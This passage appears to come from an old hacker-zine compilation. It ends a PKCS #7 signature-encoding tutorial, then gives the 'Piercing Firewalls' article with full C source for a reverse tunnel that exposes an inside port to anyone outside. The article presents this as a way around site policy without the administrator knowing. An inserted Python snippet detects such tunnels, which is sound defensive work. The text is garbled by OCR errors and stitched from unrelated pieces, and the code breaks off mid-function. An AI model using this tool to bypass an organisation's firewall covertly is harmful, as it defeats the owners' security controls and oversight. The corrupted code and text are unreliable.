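    pad_len = k - 3 - len(data)
    if pad_len < 8:
        raise ValueError("data too long for modulus: need >= 8 padding octets")
    return b"\x00\x01" + b"\xff" * pad_len + b"\x00" + data


if __name__ == "__main__":
    msg = b"x" * 25                       # constructed 25-byte message -> 30 28 ... A0 1B 04 19
    fake_md2 = bytes(range(16))           # constructed stand-in for a 16-byte MD2 output
    print(content_info_data(msg).hex(" ").upper())
    print(digest_info(fake_md2).hex(" ").upper())
    print(encryption_block(digest_info(fake_md2)).hex(" ").upper())
```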


Now we need to encode various information: a SignedData value from the inner 
ContentInfo value, then the encrypted message digest, the issuer and serial 
number of the user’s certificate, the certificate data, the message digest 
algorithm ID (MD2) and the encryption algorithm ID (PKCS #1 RSA). 


The encoded SignedData is: 


== DATA BLOCK #3 == 


30 82 02 3D 
   02 01 01                                    version = 1 
   31 [size of inner data block]               digestAlgorithms 
      30 [size] 
         06 08 2A 86 48 86 F7 0D 02 02         algorithm ID = MD2 
         05 00                                 parameters = NULL (0x00) 
   [ContentInfo data]                          content = inner ContentInfo 
   A0 82 01 [size]                             certificates 
      [certificate data]                       user’s certificate 
   31 81 [size]                                signerInfos 
      30 81 [size] 
         02 01 01                              version = 1 
         30 [size]                             issuerAndSerialNumber 
            [issuer data]                      issuer 
            02 04 {12 34 56 78}                size (4), serialNumber 
         30 [alg_size]                         digestAlgorithm 
            06 08 2A 86 48 86 F7 0D 02 02      algorithm ID = MD2 
            05 00                              parameters = NULL (0x00) 
         30 [dig_size]                         digestEncryptionAlgorithm 
            06 [sz]                            rsaEncryption 
               2A 86 48 86 F7 0D 01 01 01 
            05 00                              parameters = NULL (0x00) 
         04 [data_size]                        encryptedDigest 
            [encrypted digestInfo encoded data block] 
Finally, a ContentInfo value from this SignedData data block is encoded 
again, using PKCS #7: 


30 82 02 [size] 
   06 09 2A 86 48 86 F7 0D 01 07 02            contentType = signedData 
   A0 82 02 [size]                             [0] EXPLICIT 
      [here goes the whole DATA BLOCK #3]      content = SignedData value 


(the object identifier of PKCS #7 signedData is {1 2 840 113549 1 7 2}) 


HEX Dump 


[ The hex dump of the complete encoded message that followed here is not 
  legible in this copy; only fragments of its ASCII column ("ContentInfo", 
  "xample Organizat") survive. ] 
Many other demo (not only ;) keys, tons of related C++ source/libraries for 

"That which does not kill us 
makes us stronger" 
-- Friedrich Nietzsche 
----[ Piercing Firewalls 


--[ bishnu@hotmail.com 


Introduction: 
Many ISPs manage a firewall to protect their users against the hostile 
Internet. While the firewall might protect the users, it also serves to limit 
their freedom. 


Most firewalls don’t allow a connection to be established if the 
initiative is coming from the outside, as this automatically disables many 
security vulnerabilities. Unfortunately, this also means that many other 
things are not possible; for example, sending an X-display to a machine behind 
the firewall, or something similar. 


One solution is to ask the firewall administrator to configure the firewall 
not to disable X connections (or the port you plan to use). This normally 
means allowing connections on port 6000 to penetrate the firewall. But often 
the admin does not want to, as he is either too busy, hasn’t figured out how 
to configure the firewall yet, or simply refuses to, as it violates the site 
security policy. Maybe you don’t even want him to know that you plan to send 
some traffic backwards. 


For this purpose I wrote two simple programs that transmit TCP connections 
back through a tunnel, to your machine. 


The tunnel: 


The solution is two programs, one running at your machine, or some other 
machine behind the firewall, and another running at some *NIX-box on the 
Internet. The program behind the firewall (called tunnel) connects to a 
program (called portal) on the machine on the Internet. This connection 
probably won’t be intercepted by the firewall (depending on the security 
policy), as it is outgoing. Once the connection from the tunnel to the portal 
is established, the portal opens a port for incoming TCP traffic, and we are 
ready to rock. Whenever a machine connects to the portal it sends the request 
back to the tunnel through the already established connection through the 
firewall; the tunnel will then forward the connection to your machine. 


The effect will be that you drag a port on your machine (or any machine 
behind the firewall) onto the other side of the firewall, which means that 
anyone can connect to it regardless of the site’s security policy. 


An example: 


Goof: Your machine. 
Foo : Some other machine behind the firewall or same as Goof, running ’tunnel’. 
Bar : Some machine on the other side of the firewall running ’portal’. 
Boof: Some machine wanting to connect to machine Goof, or same as Bar. 


                          FIREWALL 
       tunnel                .                 portal 
     #########               .               ######### 
     #  Foo  #               .               #  Bar  # 
     #########               .               ######### 
         #                   .                   # 
         #                   .                   # 
        Goof                 .                 Boof 
                          FIREWALL 


You are sitting on machine Goof, and you run some program on machine Boof, 
this program happens to be using X-windows, so you want to send the display 
back to machine Goof. X-windows tries to establish a TCP connection through 
the firewall, which is ’burned’. 


So you start the tunnel on machine Foo, and set it to connect to machine 
Bar at lets say port 7000 (where the portal is running), also you set the 
tunnel to forward all TCP connections, coming back from the portal, to your 
machine Goof on port 6000 (X-windows). You start the portal on machine Bar, 
and you make it listen for the tunnel on port 7000. Once the tunnel has 
connected, the portal listens on port 6001 for incoming X. Whenever some 
X-application connects to the portal, the connection is passed to the tunnel, 
which then forwards it to machine Goof on port 6000. 


Finally on machine Boof you set your display to machine Bar:1 (in a tcsh 
type ’setenv DISPLAY bar:1’, in bash ’export DISPLAY=bar:1’), which tells the 
application to use port 6001 (we can’t use port 6000 if the machine is running 
an X-server itself). You start your Xeyes, and they pop in your face. 
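From the firewall operator's side, the scenario above shows up as a single long-lived outbound TCP connection (Foo to Bar on port 7000) that carries a small keep-alive at a fixed interval, the ALIVE_TIME ping the tunnel code sends so that idle-timeout firewalls don't drop it. The following is an added example, not part of the original article or its tunnel/portal code, that flags such connections in constructed flow records; the record format, thresholds and sample values are assumptions.

```python
# Added example: heuristic for spotting reverse-tunnel style connections in
# flow records. Not from the original article; records and thresholds are constructed.
from dataclasses import dataclass, field
from statistics import mean, pstdev
from typing import List

INTERNAL_PREFIXES = ("10.", "192.168.")          # assumed inside address space
COMMON_OUTBOUND_PORTS = {22, 25, 53, 80, 443}    # ports where long sessions are expected


@dataclass
class Flow:
    src: str
    sport: int
    dst: str
    dport: int
    start: int                          # epoch seconds
    end: int
    # timestamps of small (< 64 byte payload) packets sent by src, assumed
    # to be exported by the flow sensor
    small_pkt_times: List[int] = field(default_factory=list)


def is_internal(ip: str) -> bool:
    return ip.startswith(INTERNAL_PREFIXES)


def has_regular_keepalive(times: List[int], min_count: int = 6,
                          min_gap: int = 10, max_jitter: float = 2.0) -> bool:
    """True when small packets recur at a steady interval: the ALIVE_TIME ping
    pattern. Interactive traffic has bursty gaps and a large spread."""
    if len(times) < min_count:
        return False
    gaps = [b - a for a, b in zip(times, times[1:])]
    return mean(gaps) >= min_gap and pstdev(gaps) <= max_jitter


def looks_like_reverse_tunnel(flow: Flow, min_duration: int = 3600) -> bool:
    """Inside -> outside, non-standard port, open for a long time, regular pings."""
    return (is_internal(flow.src) and not is_internal(flow.dst)
            and flow.dport not in COMMON_OUTBOUND_PORTS
            and flow.end - flow.start >= min_duration
            and has_regular_keepalive(flow.small_pkt_times))


def find_reverse_tunnels(flows: List[Flow]) -> List[Flow]:
    return [f for f in flows if looks_like_reverse_tunnel(f)]


# Constructed sample records.
SAMPLE_FLOWS = [
    # Foo (inside) -> Bar (outside) port 7000, open two hours, 60 s keep-alives
    Flow("10.1.1.5", 40123, "203.0.113.7", 7000, 0, 7200, list(range(0, 7201, 60))),
    # ordinary short HTTPS fetch
    Flow("10.1.1.5", 40200, "198.51.100.3", 443, 100, 130, [100, 101]),
    # long interactive SSH session: long-lived, common port, bursty traffic
    Flow("10.1.1.9", 40300, "198.51.100.9", 22, 0, 9000, [0, 7, 40, 41, 300, 301, 2000]),
]

if __name__ == "__main__":
    for f in find_reverse_tunnels(SAMPLE_FLOWS):
        print(f"possible reverse tunnel: {f.src}:{f.sport} -> {f.dst}:{f.dport}")
```

A tunnel pointed at port 443 would pass the port filter, so the keep-alive regularity and the session duration are the more robust signals here.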


Conclusion: 
If you use this program to cross a firewall you surely violate the ISP’s 
security policy, as anybody can cross it as well, that is if they know, and 
there is nothing like security by obscurity. So don’t tell your mom. 


An advantage of this approach is that you don’t need to have root access on 
either machine, which makes the whole process a bit easier. 


To compile the code, just do a ‘make’. It has been tested on 
Solaris 2.5.x, 2.6 
IRIX 6.[2,3,4] 
FreeBSD 2.1.5 
HPUX 10.x 
Linux 2.0.x 


----[ THE CODE 


<++> tunnel/Makefile
CC = gcc

OSFLAGS =
MYFLAGS = -Wall -O2 -g -pedantic
CFLAGS = $(MYFLAGS) $(PROFILE) $(OSFLAGS)

# If you compile on Solaris 2.x, uncomment the following line
# LOCAL_LIBRARIES = -lsocket

TUNNEL_OBJFILES = tunnel.o share.o
PORTAL_OBJFILES = portal.o share.o

all: tunnel portal

tunnel : $(TUNNEL_OBJFILES) share.h
	$(CC) $(TUNNEL_OBJFILES) $(LOCAL_LIBRARIES) -o tunnel
tunnel.o : tunnel.c share.h
	$(CC) -c $(CFLAGS) $(COMMFLAGS) tunnel.c
portal : $(PORTAL_OBJFILES) share.h
	$(CC) $(PORTAL_OBJFILES) $(LOCAL_LIBRARIES) -o portal
portal.o : portal.c share.h
	$(CC) -c $(CFLAGS) $(COMMFLAGS) portal.c

share.o : share.c share.h
	$(CC) -c $(CFLAGS) $(COMMFLAGS) share.c

clean:
	rm -f *.o tunnel portal core
<-->
<++> tunnel/tunnel.c 
/* 
—-TUNNEL-— 


This is the tunnel part of my firewall piercer. This code is supposed 
to be running on the inside of the firewall. The tunnel should then 
connect to the portal running on the outside. 


start it like: 
>% tunnel localhost 23 protal.machine.com 3001 


if the portal is running at port 3001 at portal.machine.com, incoming 
connections to the portal will get rerouted to this machines telnet 
port. 


a /. 


nclude <stdio.h> 
nclude <stdlib.h> 
nclude <unistd.h> 
nclude <netinet/in.h> 
nclude <sys/socket.h> 
nclude <sys/time.h> 
nclude <string.h> 
nclude <signal.h> 
nclude <errno.h> 
nclude "share.h" 


ee ee ee 


extern char tunnel_buf [MAXLEN*2]; 
char buf [MAXLEN*2]; 
extern int tunnel_des; /* The socket destination of a tunnel packet*/ 


extern int tunnel_src; /* The socket source of a tunel packet*/ 

extern int tunnel_size; /* Size of tunnel packet*/ 

extern struct connections connections; /*Linked list of connections*/ 

char *remote_machine; /*remote machine name to tunnel to*/ 
extern int tunnel_port; /*tunnel port*/ 

extern int tunnel_sock; /*tunnel socket*/ 

char *login_machine=""; /*machine to forward connections to*/ 
int login_port; /*port to forward connections to*/ 
int oldtime=0,ping_time=0; 


struct connection *descriptors [DESC_MAX]; 

extern struct connection *descriptors [DESC_MAX]; 

extern int errno; 

FILE *log=stdout; /*logfile = stdout by default*/ 


void open_tunnel () { 
tunnel_sock=remote_connect (remote_machine,tunnel_port); 


} 


extern int optind; 
extern char *optarg; 


void usage () { 

printf ("Usage: tunnel [-l logfile] <forward_machine> <forward_port>" \ 
" <portal_machine> <portal_port>\n"); 
printf ("where:\n"); 
printf ("forward_machine is the machine to which the traffic is forwarded\n") ; 
printf ("forward_port is the port to which the traffic is forwarded\n"); 
printf ("portal_machine is the machine we want to route the trafic from\n"); 
printf ("portal_port is the port we want to route the trafic from\n"); 
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printf ("Coded by %s\n",AUTHOR) ; 
} 


[RR KKK KKK KKK KK OK KKK Get the options KK OK KK KK OK KK / 


void get_options(int argc,char *argv[]) { 
int c; 
while ((c=getopt (argc,argv, "1:")) !=-1) 
switch (c) { 
case 'l1’: 
if (! (log=fopen(optarg, "w"))) { 


log=stdout; 
fprintf(log,"Unable to open logfile '’%s’:%s\n", 
optarg, strerror(errno)); 
} 
break; 
case '?': 
default: 
usage (); 
exit (-1); 
} 
/* the two next options*/ 
if (argc-optind!=4) { 
printf ("Wrong number of options!\n"); 
usage (); 
ext tL); 
} 
login_machine=get_ip (argv[optind++])j; 
login_port=atoi (argv[optind++]); 
remote_machine=get_ip(argv[optindt++]); 
tunnel_port=atoi (argv[optind++]); 
if (Login_port<1||login_port>65535]| |tunnel_port<1]||tunnel_port>65535) { 
printf ("Ports below 1 and above 65535 don’t give any sense\n"); 
usage (); 
exit (-1); 


} 


void alive() { 

/* To check wether the line is still alive, we Myping it every 
ALIVE_TIME seconds. If we don’t get a ping from the tunnel 
every ALIVE_TIME*2 we disconnect the connection to the 
portal, and wait for a new. If the portal has not died, all 
the connections through the tunnel will continue as normal once 
the connection has been established again. 

The reason why I do this is because some firewalls tend to 
disable connections if there hasn’t been any traffic for some time, 
or if the connection had been up too long time. 


a, 


/*Transmit a Myping packet, we receive th 
answer in check_tunnel_connection() */ 
if (time (NULL) -oldtime>=ALIVE_TIME) { 
oldtime=time (NULL) ; 
transmit_tunnel (buf,0,0,0); 


} 
if (time (NULL) -ping_time>ALIVE_TIME*2) { 
printf ("Connection to portal probably lost, hanging up.\n"); 
shutdown (tunnel_sock, 2); 
close (tunnel_sock); 
tunnel_sock=-1; 


} 


int reset_selector(fd_set *selector,fd_set *errsel,struct connection *con) {
  /* We tell the selector to look on the tunnel socket as well
     as our live connections. */
  int maxsock,i;
  FD_ZERO(selector);
  FD_ZERO(errsel); /* the original never cleared errsel, so stale bits could report bogus errors */
  FD_SET(tunnel_sock,selector);
  FD_SET(tunnel_sock,errsel);
  con=connections.head;
  maxsock=tunnel_sock;
  for (i=0; i<connections.num; i++, con=con->next) {
    FD_SET(con->local_sock,selector);
    FD_SET(con->local_sock,errsel);
    maxsock=max(maxsock,con->local_sock);
  }
  return(maxsock); /*We return the maximum socket number*/
}


void check_tunnel_connection(fd_set *selector,fd_set *errsel,struct connection *con) {
  /*Here we check the tunnel for incoming data*/
  if (FD_ISSET(tunnel_sock,errsel)) {
    fprintf(log,"Tunnel connection terminated!\n");
    shutdown(tunnel_sock,2);
    close(tunnel_sock);
    tunnel_sock=-1;
    return;
  }
  if (FD_ISSET(tunnel_sock,selector)) {
    if (receive_tunnel()!=-1) {
      if (tunnel_src==0&&tunnel_des==0) { /*We have a Myping packet*/
        ping_time=time(NULL); /*reset the alive_timer*/
      }
      else if (tunnel_src==0) { /*We have a 'hangup' signal for a connection*/
        if ((con=descriptors[tunnel_des])) {
          fprintf(log,"Removing connection to %s %d\n",con->host,con->port);
          removeconnection(con);
        }
      }
      else if (tunnel_des==0) { /*We have a new connection*/
        int newsock;
        if ((newsock=remote_connect(login_machine,login_port))!=-1) {
          if (newsock>=DESC_MAX) {
            /* descriptors[] has DESC_MAX slots; the original indexed it unchecked */
            fprintf(log,"Too many connections, refusing call\n");
            close(newsock);
            transmit_tunnel(buf,0,0,tunnel_src);
            return;
          }
          connections.num++;
          con=(struct connection *)malloc(sizeof(struct connection));
          con->host=(char *)malloc(MAX_HOSTNAME_SIZE);
          /* payload layout: 4-byte port, then the host name (see check_connection_port) */
          strncpy(con->host,&tunnel_buf[4],MAX_HOSTNAME_SIZE);
          con->host[MAX_HOSTNAME_SIZE-1]=0; /* strncpy does not guarantee a terminator */
          con->port=ntohl(((int *)tunnel_buf)[0]);
          con->local_sock=newsock;
          con->remote_sock=tunnel_src;
          con->time=time(NULL);
          con->next=connections.head;
          connections.head=con;
          descriptors[newsock]=con;
          fprintf(log,"Connected the incoming call from %s %d to %s %d\n",con->host,
                  con->port,login_machine,login_port);
          /*Acknowledge the new connection to the portal*/
          transmit_tunnel(buf,0,con->local_sock,con->remote_sock);
        }
      }
      else if (descriptors[tunnel_des]) {
        /*Send the data to the right descriptor*/
        writen(descriptors[tunnel_des]->local_sock,tunnel_buf,tunnel_size);
      }
      else {
        fprintf(log,"Connection to unallocated channel, hangup signal sent\n");
        /*Send a hangup signal to the portal, to disable the connection*/
        transmit_tunnel(buf,0,0,tunnel_src);
      }
    }
  }
}


int main(int argc,char **argv) {
  get_options(argc,argv);
  fprintf(log,"Opening tunnel to %s port %d\n",remote_machine,tunnel_port);
  fprintf(log,"Tunnel connections will be forwarded to host %s"\
          " port %d\n",login_machine,login_port);
  connections.num=0;
  connections.head=NULL;
  signal(SIGINT,ctrlC);
  while(1) { /*The tunnel runs infinitely*/
    struct connection *con=connections.head;
    open_tunnel();
    ping_time=time(NULL);
    while (tunnel_sock!=-1) {
      fd_set selector,errsel;
      struct timeval alive_time;
      alive_time.tv_sec=ALIVE_TIME;
      alive_time.tv_usec=0;
      alive(); /*Check whether the tunnel connection is alive*/
      if (tunnel_sock==-1) break; /* alive() may have hung up; never select on -1 */
      /* We have to listen to the tunnel and all the current connections.
         We do that with a select call */
      if (select(reset_selector(&selector,&errsel,con)+1,
                 &selector,NULL,&errsel,&alive_time)) {
        /*Check for each of the local connections*/
        check_local_connections(&selector,&errsel,con);
        /*Check for the tunnel*/
        check_tunnel_connection(&selector,&errsel,con);
      }
    }
    sleep(RETRY_TIME); /*We sleep a while*/
    /* fprintf(log,"Trying to connect to portal.\n"); */
  }
}
<-->
<++> tunnel/portal.c


/*
-PORTAL-


This is the portal part of my firewall piercer. This code is supposed
to be running on the outside of the firewall. The tunnel part should
then connect through the firewall to this program.

Start it like:
>% portal 3000 3001

for tunnel connection on port 3001 and incoming calls on 3000.

When you connect to the portal at port 3000 your connection will be
forwarded to the tunnel.
*/


/*************************************************************************/


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <string.h>
#include <netdb.h>
#include <signal.h>
#include <errno.h>
#include "share.h"


/**********************/
/*    Global data     */
/**********************/


extern char tunnel_buf[MAXLEN*2];
extern int tunnel_des;
extern int tunnel_src;
extern int tunnel_size;
extern struct connections connections;
extern struct connection *descriptors[DESC_MAX];
/* errno comes from <errno.h>; the original's "extern int errno;" clashes
   with the errno macro on current libcs and is left out */
extern int tunnel_port;          /*tunnel port*/
extern int tunnel_sock;          /*tunnel new accepted socket*/
char buf[MAXLEN*2];
char *remote_machine;            /*remote machine name*/
int tunnel_basesock;             /*tunnel base socket*/
int local_sock;                  /* local port socket*/
int local_port;                  /*local machine port*/
FILE *log=stdout;                /*logfile = stdout by default*/
int ping_time=0;


/************************* Usage *************************/


void usage() {
  fprintf(stderr,"Usage: portal [-l logfile] <local_port> <tunnel_port>\n");
  fprintf(stderr,"where:\n");
  fprintf(stderr,"local_port is the port where we accept incoming" \
          " connections\n");
  fprintf(stderr,"tunnel_port is the port where we accept the tunnel" \
          " to connect\n");
  fprintf(stderr,"Coded by %s\n",AUTHOR);
}


/************************* Get the options *************************/


extern int optind;
extern char *optarg;


void get_options(int argc,char *argv[]) {
  int c;
  while ((c=getopt(argc,argv,"l:"))!=-1)
    switch (c) {
    case 'l':
      if (!(log=fopen(optarg,"w"))) {
        log=stdout;
        fprintf(log,"Unable to open logfile '%s':%s\n",
                optarg,strerror(errno));
      }
      break;
    case '?':
    default:
      usage();
      exit(-1);
    }
  /* the two remaining positional arguments */
  if (argc-optind!=2) {
    printf("Wrong number of options!\n");
    usage();
    exit(-1);
  }
  local_port=atoi(argv[optind++]);
  tunnel_port=atoi(argv[optind++]);
  if (local_port<1||local_port>65535||tunnel_port<1||tunnel_port>65535) {
    printf("Ports below 1 and above 65535 don't make any sense\n");
    usage();
    exit(-1);
  }
}


/*************************************************************/
/*************************** Portal **************************/
/*************************************************************/


void open_local_port() {
  /*Open the local port for incoming connections*/
  struct sockaddr_in ser;
  int opt=1;
  local_sock=socket(AF_INET,SOCK_STREAM,0);
  if (local_sock==-1) {fprintf(log,"Error opening socket\n");exit(0);}
  if (setsockopt(local_sock,SOL_SOCKET,SO_REUSEADDR,
                 (char *)&opt,sizeof(opt))<0)
    {perror("setsockopt REUSEADDR");exit(1);}
  ZERO((char *)&ser,sizeof(ser));
  ser.sin_family = AF_INET;
  ser.sin_addr.s_addr = htonl(INADDR_ANY);
  ser.sin_port = htons(local_port);
  if (bind(local_sock,(struct sockaddr *)&ser,sizeof(ser))==-1) {
    fprintf(log,"Error binding to local port %d : %s\n"
            ,local_port,strerror(errno));
    exit(-1);
  }
  if (listen(local_sock,5)==-1) {
    fprintf(log,"Error listening to local port %d : %s\n"
            ,local_port,strerror(errno));
    exit(-1);
  }
  fprintf(log,"Opened local port %d on socket %d\n",local_port,local_sock);
}
void open_portal() {
  int opt=1; /* the original passed 0 here, which turns the SO_REUSEADDR call into a no-op */
  struct sockaddr_in ser;
  if ((tunnel_basesock=socket(AF_INET,SOCK_STREAM,0))==-1)
    {perror("socket");exit(-1);}
  if (setsockopt(tunnel_basesock,SOL_SOCKET,SO_REUSEADDR,
                 (char *)&opt,sizeof(opt))<0)
    {perror("setsockopt REUSEADDR");exit(-1);}
  ZERO((char *)&ser,sizeof(ser));
  ser.sin_family = AF_INET;
  ser.sin_addr.s_addr = htonl(INADDR_ANY);
  ser.sin_port = htons(tunnel_port);
  if (bind(tunnel_basesock,(struct sockaddr *)&ser,sizeof(ser))==-1) {
    fprintf(log,"Error binding to tunnel port %d : %s\n"
            ,tunnel_port,strerror(errno));
    exit(-1);
  }
  if (listen(tunnel_basesock,5)==-1) {
    fprintf(log,"Error listening to tunnel port %d : %s\n"
            ,tunnel_port,strerror(errno));
    exit(-1);
  }
}
int accept_portal() {
  struct hostent *from;
  struct sockaddr_in cli;
  int newsock;
  socklen_t clilen;
  clilen=sizeof(cli);
  if (!tunnel_basesock) return(-1);
  /*Accept incoming calls*/
  newsock=accept(tunnel_basesock,(struct sockaddr *)&cli,&clilen);
  if (newsock==-1) return(-1);
  /*We want to know our remote host better*/
  from=gethostbyaddr((char *)(&cli.sin_addr),sizeof(cli.sin_addr),PF_INET);
  if (!from) {
    close(newsock);
    return(-1);
  }
  fprintf(log,"Tunnel connection from:%s %d\n",from->h_name,ntohs(cli.sin_port));
  return(newsock);
}


void close_portal() {
  shutdown(tunnel_sock,1);
  close(tunnel_sock);
}


struct connection *receive_local() {
  struct sockaddr_in cli;
  int newsock;
  socklen_t clilen;
  struct hostent *from;
  struct connection *con;
  clilen=sizeof(cli);
  /*Accept incoming calls*/
  newsock=accept(local_sock,(struct sockaddr *)&cli,&clilen);
  if (newsock==-1)
    {fprintf(log,"Server Accept Error:%s\n",strerror(errno));exit(-1);}
  /*We want to know our remote host better*/
  from=gethostbyaddr((char *)(&cli.sin_addr),sizeof(cli.sin_addr),PF_INET);
  if (!from) { /* the original dereferenced from->h_name without this check */
    fprintf(log,"Cannot resolve the caller, dropping it\n");
    close(newsock);
    return(NULL);
  }
  if (newsock>=DESC_MAX) { /* descriptors[] only has DESC_MAX slots */
    fprintf(log,"Too many connections, dropping the caller\n");
    close(newsock);
    return(NULL);
  }
  fprintf(log,"New connection from:%s %d\n",from->h_name,ntohs(cli.sin_port));
  /*Add our new friend to our list of connections*/
  connections.num++;
  con=(struct connection *)malloc(sizeof(struct connection));
  con->host=strdup(from->h_name);
  con->port=ntohs(cli.sin_port);
  con->local_sock=newsock;
  con->remote_sock=0;
  con->time=time(NULL);
  con->next=connections.head;
  connections.head=con;
  descriptors[newsock]=con;
  return(con);
}

void alive() {
  /* If we don't get a ping from the tunnel
     every ALIVE_TIME*2 we disconnect the connection to the
     tunnel, and wait for a new one. If the tunnel has not died, all
     the connections from the tunnel will continue as normal once
     the connection has been established again*/
  if (time(NULL)-ping_time>ALIVE_TIME*2) {
    printf("Connection to tunnel probably lost, hanging up.\n");
    shutdown(tunnel_sock,2);
    close(tunnel_sock);
    tunnel_sock=-1;
  }
}


int reset_selector(fd_set *selector,fd_set *errsel,struct connection *con) {
  /* We tell the selector to look on the tunnel socket as well
     as our live connections, and the connection socket.*/
  int maxsock,i;
  FD_ZERO(selector);
  FD_ZERO(errsel); /* the original never cleared errsel */
  FD_SET(local_sock,selector);
  FD_SET(tunnel_sock,selector);
  FD_SET(local_sock,errsel);
  FD_SET(tunnel_sock,errsel);
  con=connections.head;
  maxsock=max(local_sock,tunnel_sock);
  for (i=0; i<connections.num; i++, con=con->next) {
    FD_SET(con->local_sock,selector);
    FD_SET(con->local_sock,errsel);
    maxsock=max(maxsock,con->local_sock);
  }
  return(maxsock);
}


void check_tunnel_connection(fd_set *selector,fd_set *errsel,struct connection *con) {
  /*Here we check the tunnel for incoming data*/
  if (FD_ISSET(tunnel_sock,errsel)) {
    fprintf(log,"Tunnel connection terminated!\n");
    shutdown(tunnel_sock,2);
    close(tunnel_sock);
    tunnel_sock=-1;
    return;
  }
  if (FD_ISSET(tunnel_sock,selector)) {
    if (receive_tunnel()!=-1) {
      if (tunnel_src==0&&tunnel_des==0) { /*We got a Myping*/
        ping_time=time(NULL);
        /* Ping the tunnel back!*/
        transmit_tunnel(buf,0,0,0); /*Send a Myping back*/
      }
      else if (tunnel_des) {
        if (descriptors[tunnel_des]) {
          con=descriptors[tunnel_des];
          if (tunnel_src!=0) {
            /* a zero-length packet here is the tunnel's acknowledgement of a new call */
            con->remote_sock=tunnel_src;
            writen(descriptors[tunnel_des]->local_sock,tunnel_buf,tunnel_size);
          }
          else {
            printf("Hangup signal received. Removing connection to %s %d\n",con->host,
                   con->port);
            removeconnection(con);
          }
        }
      }
    }
  }
}


void check_connection_port(fd_set *selector,fd_set *errsel,struct connection *con) {
  /*Here we check the connection port for new connections*/
  if (FD_ISSET(local_sock,selector)) {
    con=receive_local();
    if (con) {
      printf("Transmitting the new connection\n");
      /* payload: 4-byte port in network order, then the host name */
      *((int *)(&buf[4]))=htonl(con->port);
      strncpy(&buf[8],con->host,MAX_HOSTNAME_SIZE);
      buf[8+min(strlen(con->host),MAX_HOSTNAME_SIZE-1)]=0; /* terminate inside the sent region */
      transmit_tunnel(buf,4+min(strlen(con->host)+1,MAX_HOSTNAME_SIZE),con->local_sock,0);
    }
  }
}


int main(int argc,char **argv) {
  get_options(argc,argv);
  init_descriptors();
  connections.num=0;
  connections.head=NULL;
  /* the original also did remote_machine=get_ip(argv[2]) here, but the portal
     never uses remote_machine and argv[2] is not a host when -l is given */
  fprintf(log,"Tunneling incoming calls on port %d to port %d \n"
          ,local_port,tunnel_port);
  fprintf(log,"Opening portal\n");
  open_portal();
  signal(SIGINT,ctrlC);
  fprintf(log,"Opening localport\n");
  open_local_port();
  while (1) {
    fprintf(log,"Waiting for tunnel connection on port %d\n",tunnel_port);
    while ((tunnel_sock=accept_portal())==-1) sleep(4);
    ping_time=time(NULL);
    while (tunnel_sock!=-1) {
      fd_set selector,errsel;
      struct connection *con=NULL;
      struct timeval alive_time;
      alive_time.tv_sec=ALIVE_TIME;
      alive_time.tv_usec=0;
      alive();
      if (tunnel_sock==-1) break; /* alive() may have hung up; never select on -1 */
      /* We have to listen to the tunnel, the local port, and all the
         current connections. */
      if (select(reset_selector(&selector,&errsel,con)+1,
                 &selector,NULL,&errsel,&alive_time)) {
        check_tunnel_connection(&selector,&errsel,con);
        check_connection_port(&selector,&errsel,con);
        check_local_connections(&selector,&errsel,con);
      }
    }
    sleep(2);
  }
}
<-->
<++> tunnel/share.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/utsname.h>
#include <fcntl.h>
#include <string.h>
#include <signal.h>
#include <errno.h>
#include <netdb.h>
#include "share.h"


char tunnel_buf[MAXLEN*2];      /*Buffer to store the tunnel data in*/
int tunnel_des;                 /*Destination socket */
int tunnel_src;                 /*Source socket*/
int tunnel_size;                /*Size of the data currently in the buffer*/
int tunnel_sock;                /*The socket of the portal*/
int tunnel_port;                /*The port we want to run on*/
extern FILE *log;               /* Our log file*/
/* errno is provided by <errno.h>; the original "extern int errno;" is left out */
struct connection *descriptors[DESC_MAX];
struct connections connections; /*A linked list of our connections*/
/*
Packet header:
###########################################################
  Dest  | Source | Data size | data comes here
###########################################################
 1 byte | 1 byte |  2 bytes  |
If the destination field is zero, we are initiating a new connection.
If the source field is zero, we are dropping a connection.
If both the destination and the source are zero, it is a Myping packet.
*/


void ctrlC(int sig) {
  fprintf(log,"Shutting down the hard way\n");
  shutdown(tunnel_sock,2);
  close(tunnel_sock);
  exit(-1);
}


char *get_ip(char *host) {
  struct hostent *remote;
  struct in_addr *in;
  remote=gethostbyname(host);
  if (remote==NULL) {
    fprintf(log,"Hostinformation of remote machine '%s' not resolved,"
            " reason:%s\n",host,strerror(errno));
    exit(-1);
  }
  in=(struct in_addr *)remote->h_addr_list[0];
  return(strdup(inet_ntoa(*in)));
}


int transmit_tunnel(char *data,int size,int source,int destination) {
  int nleft=size+4,nwritten;
  fd_set selector,errsel;
  data[0]=(unsigned char)destination;  /*Destination into header*/
  data[1]=(unsigned char)source;       /*Source into header*/
  *((u_short *)&data[2])=htons(size);  /*Size into header*/
  while (nleft>0) {
    FD_ZERO(&errsel);
    FD_ZERO(&selector);
    FD_SET(tunnel_sock,&errsel);
    FD_SET(tunnel_sock,&selector);
    select(tunnel_sock+1,NULL,&selector,&errsel,NULL); /*wait until writable*/
    if (FD_ISSET(tunnel_sock,&errsel)) {
      printf("Big bug\n");
    }
    nwritten=write(tunnel_sock,data,nleft);
    if (nwritten==-1) {
      fprintf(log,"Error writing to tunnel:%s\n",strerror(errno));
      tunnel_sock=-1;
      return(nwritten);
    }
    else if (nwritten==0) {
      fprintf(log,"Error: Wrote zero bytes in transmit_tunnel\n");
      return(nwritten);
    }
    nleft-=nwritten;
    data+=nwritten;
  }
  return(size - nleft);
}


int receive_tunnel() {
  int n,left,got=0,sofar=0;
  /* First the 4-byte header */
  while (sofar<4) {
    n=read(tunnel_sock,&tunnel_buf[sofar],4-sofar);
    if (n<1) {
      fprintf(log,"Connection terminated!\n");
      shutdown(tunnel_sock,2);
      close(tunnel_sock);
      tunnel_sock=-1;
      return(-1);
    }
    sofar+=n;
  }
  /* the casts keep channel numbers 128..255 from going negative (char may be signed) */
  tunnel_des=(unsigned char)tunnel_buf[0];          /*Fetch the destination*/
  tunnel_src=(unsigned char)tunnel_buf[1];          /*Fetch the source*/
  tunnel_size=ntohs(*((u_short *)&tunnel_buf[2]));  /*Fetch the size*/
  if (tunnel_des>=DESC_MAX||tunnel_src>=DESC_MAX||tunnel_size>MAXLEN) {
    /* both channel fields index descriptors[DESC_MAX] and the payload must fit
       in tunnel_buf; the original used all three unchecked */
    fprintf(log,"Bad tunnel header, hanging up\n");
